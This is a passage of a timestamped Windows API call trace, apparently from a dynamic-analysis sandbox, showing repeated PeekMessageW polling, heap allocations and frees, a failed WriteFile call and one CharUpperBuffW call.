hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.429] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.430] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.431] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.432] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.433] GetLastError () returned 0x6 [0257.433] SetLastError (dwErrCode=0x6) [0257.433] GetLastError () returned 0x6 [0257.433] SetLastError (dwErrCode=0x6) [0257.433] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.433] GetLastError () returned 0x6 [0257.433] GetLastError () returned 0x6 [0257.433] SetLastError (dwErrCode=0x6) [0257.433] GetLastError () returned 0x6 [0257.433] SetLastError (dwErrCode=0x6) [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d48 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.433] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.435] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.435] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.435] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.435] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.435] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.435] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.435] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.435] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.436] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18793135860) returned 1 [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.436] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.436] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc018f8 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.436] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9b08 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.436] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.437] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.437] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.437] PeekMessageW 